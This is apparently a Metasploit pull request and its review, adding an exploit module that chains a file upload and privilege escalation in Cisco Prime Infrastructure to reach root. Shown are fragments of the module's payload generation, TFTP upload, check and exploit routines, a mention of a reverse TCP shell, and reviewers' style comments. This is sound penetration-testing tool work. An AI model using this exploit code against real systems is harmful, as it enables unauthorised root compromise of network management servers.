### PR TITLE
Create exploit for Cisco Prime Infrastructure RCE

### PR DESCRIPTION
**Pull request by pedrib**
This module exploits two vulnerabilities in Cisco Prime Infrastructure to achieve RCE as root. The first vuln is an arbitrary file upload, allowing us to get rce as an unprivileged user. The second vuln is a privilege escalation to root.

This module has been tested in Prime 3.2 and 3.4. Please check the description and links on the module for more details, and have fun popping this easy shell.

### CODE REVIEW

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 1]
```diff
@@ -0,0 +1,193 @@
...
+    tftp_client.send_write_request
+
+    remote_file
+  end
+
+  def generate_jsp_payload
+    exe = generate_payload_exe
+    base64_exe = Rex::Text.encode_base64(exe)
+
+    native_payload_name = rand_text_alpha(rand(6)+3)
```
Comment (bcoles) [inline modules/exploits/linux/http/cisco_prime_inf_rce.rb]: `rand_text_alpha` now supports a range:

```ruby
rand_text_alpha(3..9)
```

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 2]
```diff
@@ -0,0 +1,194 @@
+
```
Comment (bcoles) [inline modules/exploits/linux/http/cisco_prime_inf_rce.rb]: Redundant new line

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 3]
```diff
@@ -0,0 +1,194 @@
...
+##
+# This module requires Metasploit: http://metasploit.com/download
```
Comment (bcoles) [inline modules/exploits/linux/http/cisco_prime_inf_rce.rb]: `https`

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 4]
```diff
@@ -0,0 +1,194 @@
...
+    native_payload_name = rand_text_alpha(rand(6)+3)
+
+    var_raw     = rand_text_alpha(rand(8) + 3)
+    var_ostream = rand_text_alpha(rand(8) + 3)
+    var_pstream = rand_text_alpha(rand(8) + 3)
+    var_buf     = rand_text_alpha(rand(8) + 3)
+    var_decoder = rand_text_alpha(rand(8) + 3)
+    var_tmp     = rand_text_alpha(rand(8) + 3)
+    var_path    = rand_text_alpha(rand(8) + 3)
+    var_tmp2     = rand_text_alpha(rand(8) + 3)
```
Comment (bcoles) [inline modules/exploits/linux/http/cisco_prime_inf_rce.rb]: Indentation

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 5]
```diff
@@ -0,0 +1,194 @@
...
+    var_path2    = rand_text_alpha(rand(8) + 3)
```
Comment (bcoles) [inline modules/exploits/linux/http/cisco_prime_inf_rce.rb]: Indentation

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 6]
```diff
@@ -0,0 +1,194 @@
...
+        OptPort.new('RPORT', [true, 'The target port', 443]),
+        OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]),
+        OptBool.new('SSL', [true, 'Use SSL connection', true]),
+        OptString.new('TARGETURI', [ true,  "swimtemp path", '/swimtemp'])
+      ])
+  end
+
+
+  def check
+    res = send_request_cgi({
```
Comment (bcoles) [inline modules/exploits/linux/http/cisco_prime_inf_rce.rb]: Golfed / tidied:

```ruby
  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], 'swimtemp'),
      'method' => 'GET'
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 404 && res.body.length == 0
      # at the moment this is the best way to detect
      # a 404 in swimtemp only returns the error code with a body length of 0,
      # while a 404 to another webapp or to the root returns code plus a body with content
      return CheckCode::Detected
    end

    CheckCode::Safe
  end
```

**Comment by pedrib** [comment]
Just waiting for the full disclosure post URL to appear in the archives, I will then add it in the placeholder. Everything else in this module is good to test and go.

**Comment by bcoles** [comment]
Please add some module [documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation) for this module.

* [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
* [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)

**Comment by pedrib** [comment]
@bcoles docs added. This should be good to go now.

**Review by bcoles — APPROVED** [review]

**Comment by pedrib** [comment]
@bcoles  here you go, the result of a check, reverse TCP shell and issuing "ls" and "whoami" commands

[prime.pcap.zip](https://github.com/rapid7/metasploit-framework/files/2526781/prime.pcap.zip)

**Review by bcoles — APPROVED** [review]
LGTM

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 7]
```diff
@@ -0,0 +1,199 @@
...
+
+  def exploit
+    jsp_payload = generate_jsp_payload
+
+    jsp_name = upload_payload(jsp_payload)
+
+    # we land in /opt/CSCOlumos, so we don't know the apache directory
+    # as it changes between versions... so leave this commented for now
+    # ... and try to find a good way to clean it later
+    # register_files_for_cleanup(jsp_name)
```
[the remark this answers is not in the document]
Comment (pedrib) [reply modules/exploits/linux/http/cisco_prime_inf_rce.rb]: done!

**Comment by bcoles** [comment]
This looks reasonable; @pedrib 's assertions are usually legit; story checks out; a pcap has been provided; the tests are passing; and it's been over a month without anyone reviewing or commenting.

Landing...

**Pull request merged**